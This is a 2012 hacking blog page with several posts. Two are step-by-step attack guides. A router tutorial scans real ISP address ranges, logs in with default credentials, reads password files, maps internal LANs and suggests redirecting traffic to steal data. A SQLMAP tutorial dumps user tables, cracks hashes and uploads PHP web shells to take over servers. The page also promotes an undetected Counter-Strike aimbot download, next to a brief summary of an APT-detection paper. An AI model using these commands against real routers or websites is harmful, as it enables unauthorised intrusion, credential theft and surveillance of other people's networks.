New Post

Rss

Tuesday, October 30, 2012
Want to become Hacker, I will make you expert

Want to become Hacker, I will make you expert

You want to become Hacker! I will make you the one. Not actually the one, Expert one and its all free. Because teaching should be free as said in holy books. I can give you 100% assurance that if you are willing to become hacker, i will make you the best one. I will teach you whatever i know, whatever i don't know ( i will learn and then i will share with you). Because none can be perfect but experts always exist. Most people have aspirations to become a hacker but they don't know from where to start and what is good and what is bad. Being Hacker as per media is bad but when you go inside you will know the truth. I will help you to explore the same. We are born hackers and started hacking ever since birth but never able to realized the hackers inside ourselves. But you will now, because i will act as catalyst.
Note: Catalyst, everything is in you, i will just guide you.

Disclaimer : Its up to individual which path he chooses, my motto is to provide knowledge and ethics and i will not leave a single stone unturned.

want to become hacker
Learn Hacking Campaign
Many users daily ask me the one same question again and again. Sir, I want to become an hacker, please teach me. Its really embarrassing at first but then i realized about the positiveness and peoples willingness to learn about cyber security and ethical hacking and most of you will not believe i decided that i will start my campaign again as i don't wanna hurt feeling of learners. Its being a great time when i first started the campaign under the name ISOFTDL cybercops and then under Hackingloops under CHECKMATE program. Because of personal reasons and hectic schedule, i need to turn down the programs but now i have time for my friends, users and learners. I am starting my Campaign again under Hackingloops under program name "Born Hackers Club" (BHC). 

Born Hackers Club :
Hackingloops is starting Born Hackers Club group to teach people Hacking and Cyber security. This time i will be starting from very basics and we will be more practical time than theoretical but focus will always remain at concepts.

Few Key features of Born Hackers Club Campaign :
1. Every week we learn two topics and will have one practical session to test our learnt skills.
2. I have created a website and created an virtual environment(both Linux and windows) where we all can practice hacking techniques.
3. I will share all my articles in easy to download PDF documents.
4. All practicals will be made available to all learners in form of videos.
5. I will introduce easy to contact feature, where you can ask any query live.
6. We will cover each and every tool of Backtrack and Matruix Operating system and all other hack tools in our classes.
7. All Hacking tools tutorials will be demonstrated with the help of video lectures.
8. Will teach both offensive and defensive hacking techniques.
9. Will conduct Hacking Exams Online both theoretical and Practical ( all exams will be having prizes for winners).
10.  Most Important, Everything is free and open to all. So feel free to join and learn Hacking with HackingLoops.

The inauguration of Born Hackers Club is Planned on 1 Dec, 2012. You all will receive updates regarding the Hacking Club on regular basis. 

Because when i said I will make you Hacker ! then my duty will end when you will become a Hacker i.e. When you become good enough that you can say in front of 1000 people in seminar, i can Hack you now because i am Hacker.

All the ideas are heartily welcomed and we will try our best to incorporate all the ideas suggested regarding the group and knowledge sharing, infrastructure or any thing related. 

Guys i am starting this campaign to help you to find a hacker hidden inside you, so be extrovert enough to be a part of this campaign.
I am also inviting all experts to be a part of this campaign because it knowledge and it only grows when you share.

This is just a introduction what i am up to and what i am going to start. So we are 31 days away from our start. Don't worry we will not disappoint you during these 31 days, you will regularly get updates on Born Hackers Club and will continually get latest Hacking articles other than our campaign. So be a part of our Family " Family of Hackers : Because I want to listen that we are Hackers, we are born Hackers".

Regards,
Lokesh Singh (Lucky aka De$trUctive M!nd),
Owner of Hackingloops and Ccodechamp


Sunday, October 28, 2012
Hacking BSNL Broadband Routers Tutorial by Hackingloops

Hacking BSNL Broadband Routers Tutorial by Hackingloops

Hey friends, yesterday we learnt about Hacking websites using SQLMAP and Advanced Persistant threat. Today we are going to learn how to break into BSNL ADSL routers. Hacking BSNL broadband routers is quite interesting, so Hackingloops has came up with tutorial on Hacking BSNL broadband routers Tutorial on how to hack BSNL broadband routers.

Hacking BSNL routers
Hacking BSNL Routers


Note : This hack works on most of newly ADSL, ADSL2+, ADSL2+M routers.
In this article we are going to hack into router to learn more about it. You might not know that this small and innocent looking modem is actually a "Linux CPU". Lets get into it. First do a nmap scan of this modem. Here is a quick example :
$ nmap 192.168.1.1

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-31 19:52 IST
Nmap scan report for 192.168.1.1
Host is up (0.052s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
5431/tcp open  park-agent

Nmap done: 1 IP address (1 host up) scanned in 0.75 seconds
The http port is open and that is why we are able to access the administration page from http://192.168.1.1/
But apart from http the telnet port is also open. So why not try connecting to it.


$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
SemIndia Systems ADSL Router
Login: admin
Password: 
>
 
 Wow! we are able to login into the telnet daemon of our router using the default username/password of admin/admin.
What next... type in the help command and hit enter. It will list the supported commands somewhat like this


> help

?
help
logout
reboot
adsl
atm
brctl
cat
df
dumpcfg
echo
ifconfig
kill
arp
defaultgateway
dhcpserver
dns
lan
passwd
ppp
remoteaccess
restoredefault
route
save
swversion
wan
serialnum
lan6
dhcp6c
dns6
defaultgateway6
route6
ping
ps
pwd
sntp
sysinfo
tftp

>

 Some of these are the common terminal commands on linux. ps, pwd, ping, cat etc. So lets see the current working directory using pwd.

> pwd
/
>

Listing directories

So we are in the root directory of the filesystem. The ls command is not available. So we have to use another trick to list the directories. And the trick is echo *

> echo *
bin dev etc images lib linuxrc mnt proc sbin usr var webs
>
 Cool! Now those directories are found on any linux system like Ubuntu, Fedora etc. 

/etc/passwd file

You might next want to see the password file /etc/passwd. The cat command is available and can be used for this.

> cat /etc/passwd
admin:7wfiFif6nh6VA:0:0:Administrator:/:/bin/sh
support:MVMCoQ0jGR4Yo:0:0:Technical Support:/:/bin/sh
user:MrYImHrIkIxRI:0:0:Normal User:/:/bin/sh
nobody:685CCPc3VWsbs:0:0:nobody for ftp:/:/bin/sh
>
Thats a linux password file.

Linux version

The uname command is not available so to get the linux kernel version and other details use the following command
> cat /proc/version
Linux version 2.6.8.1 (root@localhost.localdomain) (gcc version 3.4.2) #1 Wed Dec 16 08:35:56 IST 2009
>
So that shows the linux kernel version and some extra details.

Better shell

The above shell can be improved by running the sh command.
> sh


BusyBox v1.00 (2009.12.16-03:08+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

#

So now we get a BusyBox shell. Once again we can type the help command to see what all is available.

# help

Built-in commands:
-------------------
        . : break cd continue eval exec exit export help login newgrp
        read readonly set shift times trap umask wait [ busybox cat chmod
        cp date dmesg echo expr false ftpget ifconfig init insmod kill
        killall klogd linuxrc ln logger logread mkdir mount msh ping
        ps pwd reboot rm rmmod route sendarp sh sleep sysinfo syslogd
        test tftp tftpd true tty umount vconfig

#
This time we have a few additional commands available, like cd, mkdir, date, eval, exec etc and even mount.
A list of all possible commands that Busybox can have is available here.


CPU/RAM Information

The details about CPU and architecture can be found out using the following command
# cat /proc/cpuinfo
system type             : 96338L-2M-8M
processor               : 0
cpu model               : BCM6338 V1.0
BogoMIPS                : 239.20
wait instruction        : no
microsecond timers      : yes
tlb_entries             : 32
extra interrupt vector  : yes
hardware watchpoint     : no
unaligned access                : 1289794
VCED exceptions         : not available
VCEI exceptions         : not available
#


Its an MIPS based 32bit processor. You can compile C programs for this platform using an mips compiler. Check http://developer.mips.com/tools/compilers/ for more information. Also check http://people.debian.org/~debacle/cross/.


RAM information
# cat /proc/meminfo
MemTotal:         5688 kB
MemFree:           424 kB
Buffers:           128 kB
Cached:           1004 kB
SwapCached:          0 kB
Active:           2016 kB
Inactive:          356 kB
HighTotal:           0 kB
HighFree:            0 kB
LowTotal:         5688 kB
LowFree:           424 kB
SwapTotal:           0 kB
SwapFree:            0 kB
Dirty:               0 kB
Writeback:           0 kB
Mapped:           1764 kB
Slab:             2284 kB
Committed_AS:     5172 kB
PageTables:        300 kB
VmallocTotal:  1048560 kB
VmallocUsed:       120 kB
VmallocChunk:  1048400 kB
#

 
So the device seems to have around 6MB of inbuilt memory.
There are many other files in the /proc directory that can be viewed to gather more information about the system.

# cd proc
# echo *
1 10 123 17 191 2 274 275 276 290 3 378 395 4 43 49 5 548 549 6 611 612 7 8 9 accumem buddyinfo bus cmdline cpuinfo devices diskstats driver execdomains filesystems free_pagewalk fs interrupts iomem ioports irq kcore kmsg loadavg locks meminfo misc modules mounts mtd net nvram pagewalk partitions self slabinfo stat sys sysvipc tty uptime var version vmstat
#
Try viewing other files and see what comes up.

Get Current username

The whoami command is not available to the echo command has to be used to find the current username, home directory etc.
# echo $USER
root
# echo $HOME
/
# echo $PATH
/bin:/sbin:/usr/bin
#

Writing files

The var directory is writable. And files have to be created using the echo command.
# echo "ABCDEFGHIJKLMNOPQRSTUVWXYZ" >> /var/happy.txt
# cat /var/happy.txt
ABCDEFGHIJKLMNOPQRSTUVWXYZ
#

Remote files can be downloaded onto the router as well. The ftpget command is available for this. The exact syntax can be found at http://www.busybox.net/downloads/BusyBox.html.
May be you would like to write and compile a C program and then upload it to this router.

Hacking remote routers

You can discover remote routers with a simple nmap command like this
$ sudo nmap --open -sS -sV -T4 117.194.233.1/24 -p 80 -oG - | grep 'open'
# Nmap 5.21 scan initiated Sat Sep  1 11:53:58 2012 as: nmap --open -sS -sV -T4 -p 80 -oG - 117.194.233.1/24 
Host: 117.194.233.4 ()  Ports: 80/open/tcp/////
Host: 117.194.233.12 () Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.35 () Ports: 80/open/tcp//http//D-Link DSL-502T http config/
Host: 117.194.233.40 () Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.42 () Ports: 80/open/tcp//http//Embedded Allegro RomPager webserver 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 117.194.233.57 () Ports: 80/open/tcp//http//thttpd/
Host: 117.194.233.61 () Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.68 () Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.72 () Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.77 () Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.104 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.106 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.138 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.141 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.145 ()        Ports: 80/open/tcp//http//SonicWALL firewall http config/
Host: 117.194.233.150 ()        Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.158 ()        Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.160 ()        Ports: 80/open/tcp//http//Linksys wireless-G WAP http config (Name DSL-N10)/
Host: 117.194.233.217 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.227 ()        Ports: 80/open/tcp//http//Apache httpd 2.2.19/

This command just scans all the Bsnl broadband ips to see which are alive and have a port 80 open. If its micro_httpd then its most likely a SemIndia router with BusyBox shell. The "Embedded Allegro RomPager" are Airtel Binatone and Beetel modems being used by Bsnl broadband users.
One way to irritate other users is to restart the remote router by issuing the reboot command in the telnet terminal. But that would not be much fun.

Hack into the LAN

The arp command can be used on the remote router to list its LAN nodes or all the computers in its internal network. Its quite simple
> arp show

IP address       HW type     Flags       HW address            Mask     Device
192.168.1.216    0x1         0x2         ##:##:##:##:##:##     *        br0
192.168.1.33     0x1         0x2         ##:##:##:##:##:##     *        br0

>
The HW/mac address has been hidden for privacy purpose. Now the router tells us who is inside the network.
Note that that arp command shall not be available in the sh shell. It will only be available in the telnet session.

Any of the internal nodes can be pinged 
> ping 192.168.1.216
PING 192.168.1.216 (192.168.1.216): 56 data bytes
56 bytes from 192.168.1.216: icmp_seq=0 ttl=128 time=60.0 ms
56 bytes from 192.168.1.216: icmp_seq=1 ttl=128 time=80.0 ms
56 bytes from 192.168.1.216: icmp_seq=2 ttl=128 time=0.0 ms
56 bytes from 192.168.1.216: icmp_seq=3 ttl=128 time=30.0 ms

--- 192.168.1.216 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.0/42.5/80.0 ms
>

From here on it might be possible to do some advanced hacking. The insmod command is available that can be used to load kernel modules.
Hackers would like to make a remote router forward a copy of all network traffic to their own machine so that information can be stolen. The iptables command is available and can be used to do this.

Conclusion

It would be a good idea to protect your own router from such hack attempts from the internet. This can be done by disabling remote logins to telnet, http etc. Login into your configuration page and http://192.168.1.1 and find out how to do that.
This hacking technique is not only applicable to just Bsnl routers. Other isps like airtel are also using similar routers. So it might be possible to try the same thing on them as well. Just need to scan the ip range.
Rest is your creativity. Research and find out what else can be done on such routers.
Advanced Persistant Threat Analysis with Network traffic Analysis

Advanced Persistant Threat Analysis with Network traffic Analysis

A high degree of stealthiness over a prolonged duration of operation in order to do a successful cyber attack can be defined as Advanced Persistent Threat. The attack objectives therefore typically extend beyond immediate financial gain, and compromised systems continue to be of service even after key systems have been breached and initial goals reached. 

Today’s successful targeted attacks use a combination of social engineering, malware, and backdoor activities. Nart Villeneuve and James Bennett (Senior Threat Researcher) from Trend Mirco provide an ultimate guide for Detecting (APT) Advanced Persistent Threat activities with Network Traffic Analysis, that can be used to identify malware command-and control (C&C) communications related to these attacks, illustrating how even the most high-profile and successful attacks of the past few years could have been discovered. 
Detecting+Advanced+Persistent+Threat+with+Network+Traffic+Analysis
Advanced Traffic Analysis

Paper cover Detecting Remote Access Trojans like The GhostNet, Nitro attack, RSA Breach, Taidoor campaign, Sykipot campaign and more. Nart also talk about the Challenges during Network-Based Detection i.e Two key factors pose challenges to network-based detection encryption and the cloud. More than 90% of intrusions aren't even discovered by the victims themselves, but through third-party notification. 

In many cases, the APT has been on the victim network for months or even years, exfiltrating intellectual property data plus economic and political information. "The ability to detect APT activity at the network level is heavily dependent on leveraging threat intelligence. A variety of very successful ongoing campaigns can be detected at the network level because their communications remain consistent over time." 

To get rid of such attacks you much know that what that information is, where it resides, who has access to it, why they have access and when they access it. Answering these types of questions should give you a clearer picture of what are the most critical pieces in your infrastructure that need your attention. Modifications made to malware’s network communications can, however, disrupt the ability to detect them. 

As such, the ongoing development of threat intelligence based on increased visibility and information sharing is critical to developing indicators used to detect such activity at the network level. For advance detection techniques based upon Protocol-aware detection, HTTP headers, Compressed archives, Timing and size you can read complete paper available here. 

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf

Source : The Hacker News
no image

Hacking Websites using SQLMAP | HackingLoops Tutorials

Hey friends, Hackingloops is back with another tutorial on Hacking Websites. Today we will learn how to hack websites using SQLMAP. Hacking websites using SQLMAP is quite easy, if you know how to use SQLMAP. Sqlmap is one of the most popular and powerful sql injection automation tool out there. Get it from http://sqlmap.org/. In this tutorial we are going to learn how to use sqlmap to exploit a vulnerable web application and see what all can be done with such a tool.
For the list of options and parameters that can be used with the sqlmap command, check the following url
https://github.com/sqlmapproject/sqlmap/wiki/Usage

To understand this tutorial you should have a thorough understanding of how database driven web applications work. For example those made with php+mysql.

Urls

Lets say you have a url like this
http://www.site.com/section.php?id=51
and that it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the url
http://www.site.com/section.php?id=51'
We just added a single quote in the parameter. If this url throws an error then it is clear that the database has reacted with an error because it got an unexpected single quote.

Hacking with sqlmap

Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the terminal with the python interpreter.
python sqlmap.py -u "http://www.site.com/section.php?id=51"
The above is the first and most simple command to run with the sqlmap tool. It will check the url and try to discover basic information about the system. The output can look something like this
[*] starting at 12:10:33 [12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

So the sqlmap tool has discovered the Operating system, web server and database along with version information. Even this much is pretty impressive. But its time to move on and see what more is this tool capable of.
 
Discover Databases
In this step sqlmap shall be used to find out what databases exist on the target system. Again the command is very simple
$ python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs
The output could be something like this
[*] starting at 12:12:56 [12:12:56] [INFO] resuming back-end DBMS 'mysql'
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics
This time the output contains the available databases list. Move on...


Find tables in the database
Now its time to find out what tables exist in a particular database. Lets say the database of interest over here is 'safecosmetics'
Command
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics
and the output can be something similar to this
[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
[11:55:22] [INFO] retrieved: acl_acl_seq
[11:55:24] [INFO] retrieved: acl_aco
[11:55:25] [INFO] retrieved: acl_aco_map
[11:55:26] [INFO] retrieved: acl_aco_sections
[11:55:28] [INFO] retrieved: acl_aco_sections_seq
...........
isnt this amazing ? it if ofcourse. Lets get the columns of a particular table now.


Get columns of a table
Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Lets say the table is 'users' and it contains the username and password.
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users
The output can be something like this
[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)                                                                                         
[12:17:45] [INFO] retrieved: name                                                                                            
[12:17:46] [INFO] retrieved: text                                                                                            
[12:17:47] [INFO] retrieved: password                                                                                        
[12:17:48] [INFO] retrieved: text                                                                                            
[12:17:49] [INFO] retrieved: permission                                                                                      
[12:17:51] [INFO] retrieved: tinyint(4)                                                                                      
[12:17:52] [INFO] retrieved: email                                                                                           
[12:17:53] [INFO] retrieved: text                                                                                            
[12:17:54] [INFO] retrieved: system_home                                                                                     
[12:17:55] [INFO] retrieved: text
[12:17:57] [INFO] retrieved: system_allow_only
[12:17:58] [INFO] retrieved: text
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+


So now the columns are clearly visible. Good job!

Get data of the table
Now comes the most interesting part, of extracting the data from the table. The command would be
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users
The above command will simply dump the data of the particular table, very much like the mysqldump command.

The output might look similar to this


+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+

The hash column seems to have the password hash. Try cracking the hash and then you would get the login details rightaway. sqlmap will create a csv file containing the dump data for easy analysis.

What Next ?

Execute arbitrary Sql command on the server
This is probably the easiest thing to do on a server that is vulnerable to sql injection. The --sql-query parameter can be used to specify a sql query to execute. Things of interest would be to create a user in the users table or something similar. Or may be change/modify the content of cms pages etc.
Another paramter --sql-shell would give an sql shell like interface to run queries interactively.

Get inside the admin panel and play
If the website is running somekind of custom cms or something similar that has an admin panel, then it might be possible to get inside provided you are able to crack the password retrieved in the database dump. Simple and short length passwords can be broken simply by bruteforcing, however long length complex passwords may not be breakable.
Check if the admin panel allows to upload some files. If an arbitrary php file can be uploaded then it be a lot greater fun. The php file can contain shell_exec, system ,exec or passthru function calls and that will allow to execute arbitary system commands. Php web shell scripts can be uploaded to do the same thing.

Shell on remote OS
This is the thing to do to completely takeover the server. However note that it is not as easy and trivial as the tricks shown above. sqlmap comes with a parameter call --os-shell that can be used to try to get a shell on remote system, but it has many limitations of its own.
According to the sqlmap manual
It is possible to run arbitrary commands on the database server's underlying operating system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses.
The most important privilege needed by the current database user is to write files through the database functions. This is absent in most cases. Hence this technique will not work in most cases.

Note

1. Sometimes sqlmap is unable to connect to the url at all. This is visible when it gets stuck at the first task of "testing connection to the target url". In such cases its helpful to use the "--random-agent" option. This makes sqlmap to use a valid user agent signature like the ones send by a browser like chrome or firefox.
2. For urls that are not in the form of param=value sqlmap cannot automatically know where to inject. For example mvc urls like

http://www.site.com/class_name/method/43/80.
In such cases sqlmap needs to be told the injection point marked by a *

http://www.site.com/class_name/method/43*/80
The above will tell sqlmap to inject at the point marked by *

That's all friends. Special thanks to silver moon for article.
Monday, October 8, 2012
R-aimbot D3D Mode aimbot Hack for Counter Strike 1.6 VAC Undetected

R-aimbot D3D Mode aimbot Hack for Counter Strike 1.6 VAC Undetected

Hey friends, R-Aimbot is the latest aimbot hack for Counter strike 1.6 in the market. R-Aimbot is undetected by VAC and works perfectly well on Wndows 7 32bit / Windows 64 bit / Windows XP. We know most of the hacks requires OPENGL mode for working, but cool news is that R-Aimbot Aimbot hack for Counter Strike 1.6 works for all three modes D3D mode (Direct X mode), Software mode and OpenGL mode. Its a clean and perfect aimbot hack that works with D3D mode on Windows 7 64 bit.

Counter Strike aimbot hack for D3d mode
Counter Strike 1.6 Aimbot Hack


Some Cool Features of R-aimbot Aimbot Hack:
  • Aimbot
  • AutoAim
  • KnifeAim
  • AutoWall
  • AutoShoot
  • AutoPistol
  • Team
  • NoRecoil
  • NoSpread
Support :
  • Counter-Strike 1.6 (4554)
  • Windows XP/Vista/7 x32 & x64

How to use the R-aimbot aimbot Hack ?
1. Start the R-aimbot.exe file by double click on it.
2. Start Counter strike hl.exe .
3. Enjoy the game :P.


Download R-aimbot Aimbot Hack :
Download

If you have any issues ask us in form of comments.

Designed by Hackingloops.